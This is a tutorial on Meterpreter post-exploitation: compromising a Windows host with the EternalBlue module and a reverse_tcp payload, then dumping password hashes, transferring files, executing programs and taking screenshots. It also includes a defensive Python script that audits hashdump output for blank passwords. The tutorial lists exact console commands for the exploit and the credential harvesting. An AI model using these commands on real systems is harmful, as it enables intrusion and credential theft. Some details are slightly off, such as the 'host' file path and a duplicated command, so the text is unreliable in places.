Post exploitation with Meterpreter

Exploitation with Meterpreter

First, start the msf console from a terminal window in Kali.

We’re using reverse_tcp as the stager and Meterpreter as the stage.

We will begin by setting up the EternalBlue exploit. Select the ms17_010_eternalblue module, then set windows/x64/meterpreter/reverse_tcp as the payload.

Next, configure the exploit settings, then run the exploit with the exploit command:

$ set payload windows/x64/meterpreter/reverse_tcp
$ set rhost 192.168.198.136
$ exploit

File transfer with Meterpreter

With Meterpreter, you can download a file using the download command.

$ download /windows/system32/drivers/etc/host

Similarly, you can upload files to the machine using the upload command.

Extracting User Credentials:

Use the credential_collector script to extract user account information, or use the hashdump post module to similar effect.

We will use the hashdump post module to harvest the credentials. Type the following msf command.

$ run post/windows/gather/hashdump

As we can see, we have obtained the Coen, guest, and admin accounts. The admin's LM hash and the guest's NTLM hash correspond to empty passwords, whereas the Coen hash belongs to a password that you'll need to crack. You can do so by using a password cracker.
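The same reading of a dump can be automated when auditing a host for blank passwords. The following is an added example, not part of the original page: it parses pwdump-style lines (user:rid:lm:nt:::) and flags accounts whose NT hash is the hash of the empty string. The sample lines, RIDs and the non-empty hash values are constructed, and the function names are hypothetical.

```python
import re

# Well-known hashes of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in pwdump format; Coen's NT hash is made up.
SAMPLE = """\
[*] constructed status line, not a hash entry
admin:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Coen:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_hashdump(text):
    """Return one dict per well-formed user:rid:lm:nt::: line."""
    accounts = []
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip banners, status lines and malformed entries
        user, rid, lm, nt = m.groups()
        accounts.append({"user": user, "rid": int(rid),
                         "lm": lm.lower(), "nt": nt.lower()})
    return accounts


def audit(accounts):
    """Map each user to a list of findings (empty list means none)."""
    findings = {}
    for acct in accounts:
        notes = []
        # The NT hash decides whether the password is blank. An empty LM
        # value also appears when LM storage is disabled, so it is not
        # proof of a blank password on its own.
        if acct["nt"] == EMPTY_NT:
            notes.append("blank password")
        if acct["lm"] != EMPTY_LM:
            notes.append("LM hash stored")
        findings[acct["user"]] = notes
    return findings


if __name__ == "__main__":
    for user, notes in audit(parse_hashdump(SAMPLE)).items():
        print(f"{user}: {', '.join(notes) or 'no finding'}")
```

Accounts flagged "blank password" should be disabled or given a password, and any "LM hash stored" finding means LM storage should be turned off on that host.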

Executing files

You can run any file on the system with execute -f. This includes both executable files and programs with multiple supporting files. For example, to run the built-in calculator app in Windows, type:

$ execute -f calc.exe

Taking screenshots

You can also capture screenshots from the point of view of the user. Just type screenshot in the Meterpreter command shell, and you'll get a screenshot of the display on the system.

$ execute -f calc.exe
$ screenshot
